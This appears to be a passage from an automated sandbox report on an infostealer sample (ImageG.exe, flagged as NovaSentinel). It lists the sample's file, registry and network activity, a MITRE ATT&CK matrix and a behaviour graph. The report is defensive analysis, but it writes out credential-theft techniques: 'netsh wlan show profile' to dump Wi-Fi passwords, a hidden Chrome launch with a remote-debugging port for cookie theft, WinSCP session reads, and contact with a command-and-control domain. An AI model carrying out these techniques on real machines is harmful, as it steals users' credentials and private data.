        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Temp\error.jpg VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
        Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

        Lowering of HIPS / PFW / Operating System Security Settings

        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe | File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\cookies.sqlite_tmp
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe | File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\places.sqlite_tmp
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe | File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\places.sqlite_tmp
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe | File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\places.sqlite_tmp
        Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\netsh.exe | netsh wlan show profile
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct

        Stealing of Sensitive Information

        Source: Yara match | File source: sslproxydump.pcap, type: PCAP
        Source: C:\Windows\System32\reg.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe | Process created: C:\Windows\System32\cmd.exe | C:\Windows\system32\cmd.exe /d /s /c "netsh wlan show profile"
        Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\netsh.exe | netsh wlan show profile
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe | Process created: C:\Windows\System32\cmd.exe | C:\Windows\system32\cmd.exe /d /s /c "netsh wlan show profile"
        Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\netsh.exe | netsh wlan show profile
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\cookies.sqlite_tmp-shm
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\places.sqlite_tmp-shm
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\cookies.sqlite_tmp-wal
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\places.sqlite_tmp-wal
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe | File attributes queried: C:\Users\user\AppData\Local\Discord
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe | File attributes queried: C:\Users\user\AppData\Local\DiscordPTB
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe | File attributes queried: C:\Users\user\AppData\Local\DiscordCanary
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe | Directory queried: C:\Users\user\Documents
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe | File opened / queried: C:\Users\user\AppData\Roaming\.minecraft

        Remote Access Functionality

        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe | "C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --window-position=-2400,-2400
        Source: Yara match | File source: sslproxydump.pcap, type: PCAP
        MITRE ATT&CK Matrix (one technique per tactic column; a leading number is the count of signatures that hit that technique)

        Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
        Gather Victim Identity Information | 1 Scripting | Valid Accounts | 321 Windows Management Instrumentation | 1 Scripting | 1 DLL Side-Loading | 11 Disable or Modify Tools | 1 OS Credential Dumping | 1 Network Service Discovery | Remote Services | 1 Browser Session Hijacking | 3 Ingress Tool Transfer | Exfiltration Over Other Network Medium | Abuse Accessibility Features
        Credentials | Domains | Default Accounts | 11 Command and Scripting Interpreter | 1 DLL Side-Loading | 1 Extra Window Memory Injection | 1 DLL Side-Loading | 1 Credentials in Registry | 12 File and Directory Discovery | Remote Desktop Protocol | 12 Data from Local System | 1 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service
        Email Addresses | DNS Server | Domain Accounts | 2 PowerShell | 12 Registry Run Keys / Startup Folder | 11 Process Injection | 1 Extra Window Memory Injection | Security Account Manager | 44 System Information Discovery | SMB/Windows Admin Shares | 1 Email Collection | 1 Remote Access Software | Automated Exfiltration | Data Encrypted for Impact
        Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | 12 Registry Run Keys / Startup Folder | 13 Masquerading | NTDS | 421 Security Software Discovery | Distributed Component Object Model | 1 Clipboard Data | 4 Non-Application Layer Protocol | Traffic Duplication | Data Destruction
        Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Modify Registry | LSA Secrets | 2 Process Discovery | SSH | Keylogging | 5 Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact
        Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 131 Virtualization/Sandbox Evasion | Cached Domain Credentials | 131 Virtualization/Sandbox Evasion | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
        DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 11 Process Injection | DCSync | 1 Application Window Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
        Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | Indicator Removal from Tools | Proc Filesystem | 1 Remote System Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
        Behavior Graph

        Behavior Graph ID: 1639532 | Sample: ImageG.exe | Start date: 15/03/2025 | Architecture: WINDOWS | Score: 100

        Start
          Network: nova-blight.xyz (Performs DNS queries to domains with low reputation); store-na-phx-1.gofile.io; 20 other IPs or domains
          Signatures: Suricata IDS alerts for network traffic; Sigma detected: Capture Wi-Fi password; Yara detected NovaSentinel; 6 other signatures
          Started: ImageG.exe 179

        ImageG.exe 179
          Dropped: C:\Users\user\AppData\Local\...\ImageG.exe (PE32+); C:\Users\user\AppData\Local\...\nsis7z.dll (PE32); C:\Users\user\AppData\Local\...\System.dll (PE32); 10 other files (none is malicious)
          Signatures: Drops large PE files
          Started: ImageG.exe 84

        ImageG.exe 84
          Network: nova-blight.xyz 45.145.164.199, 443, 58374, 58384 INETTECH1-ASRU France; store-na-phx-1.gofile.io 94.139.32.29, 443, 58431, 61018 ENIX-ASFR Belgium; 17 other IPs or domains
          Dropped: C:\Users\user\AppData\Roaming\...\ImageG.exe (PE32); C:\Users\user\...\places.sqlite_tmp-shm (data); C:\Users\user\AppData\...\places.sqlite_tmp (SQLite); 13 other files (3 malicious)
          Signatures: Attempt to bypass Chrome Application-Bound Encryption; Uses cmd line tools excessively to alter registry or file data; Overwrites Mozilla Firefox settings; 5 other signatures
          Started: cmd.exe; cmd.exe; cmd.exe; 70 other processes

        cmd.exe (first)
          Signatures: Suspicious powershell command line found; Uses cmd line tools excessively to alter registry or file data; Tries to download and execute files (via powershell); 2 other signatures
          Started: conhost.exe; chcp.com

        cmd.exe (second)
          Started: powershell.exe; conhost.exe

        cmd.exe (third)
          Started: reg.exe; conhost.exe

        70 other processes
          Network: 192.168.11.20, 137, 1900, 443 unknown unknown; 162.159.61.3, 443, 49779, 61236 CLOUDFLARENETUS United States; 2 other IPs or domains
          Signatures: Tries to harvest and steal WLAN passwords; Loading BitLocker PowerShell Module
          Started: powershell.exe; chrome.exe; 99 other processes

        powershell.exe (child of the second cmd.exe)
          Network: i.imgflip.com 104.16.40.101, 443, 49771 CLOUDFLARENETUS United States
          Dropped: C:\Users\user\AppData\Local\Temp\error.jpg (JPEG)
          Signatures: Queries sensitive physical memory information (via WMI, Win32_PhysicalMemory, often done to detect virtual machines); Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes); Queries memory information (via WMI often done to detect virtual machines)

        reg.exe (child of the third cmd.exe)
          Signatures: Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

        powershell.exe (child of the 70 other processes)
          Signatures: Loading BitLocker PowerShell Module

        chrome.exe
          Network: plus.l.google.com 172.217.215.102, 443, 49795 GOOGLEUS United States; 172.217.215.99, 443, 49784, 49785 GOOGLEUS United States; 2 other IPs or domains

        99 other processes
          Started: net1.exe; Conhost.exe; Conhost.exe
